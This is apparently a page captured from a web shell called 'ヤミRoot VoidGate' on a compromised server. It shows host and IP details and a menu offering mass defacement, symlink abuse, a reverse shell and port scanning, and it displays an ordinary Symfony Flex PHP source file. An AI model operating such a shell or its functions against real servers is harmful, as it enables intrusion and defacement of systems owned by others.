ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
symfony
/
flex
/
src
/
Viewing: InformationOperation.php
<?php namespace Symfony\Flex; use Composer\DependencyResolver\Operation\OperationInterface; use Composer\Package\PackageInterface; /** * @author Maxime Hélias <maximehelias16@gmail.com> */ class InformationOperation implements OperationInterface { private $package; private $recipeRef = null; private $version = null; public function __construct(PackageInterface $package) { $this->package = $package; } /** * Call to get information about a specific version of a recipe. * * Both $recipeRef and $version would normally come from the symfony.lock file. */ public function setSpecificRecipeVersion(string $recipeRef, string $version) { $this->recipeRef = $recipeRef; $this->version = $version; } /** * Returns package instance. * * @return PackageInterface */ public function getPackage() { return $this->package; } public function getRecipeRef(): ?string { return $this->recipeRef; } public function getVersion(): ?string { return $this->version; } public function getJobType() { return 'information'; } /** * {@inheritdoc} */ public function getOperationType() { return 'information'; } /** * {@inheritdoc} */ public function show($lock) { $pretty = method_exists($this->package, 'getFullPrettyVersion') ? $this->package->getFullPrettyVersion() : $this->formatVersion($this->package); return 'Information '.$this->package->getPrettyName().' ('.$pretty.')'; } /** * {@inheritdoc} */ public function __toString() { return $this->show(false); } /** * Compatibility for Composer 1.x, not needed in Composer 2. */ public function getReason() { return null; } }
Coded With 💗 by
0x6ick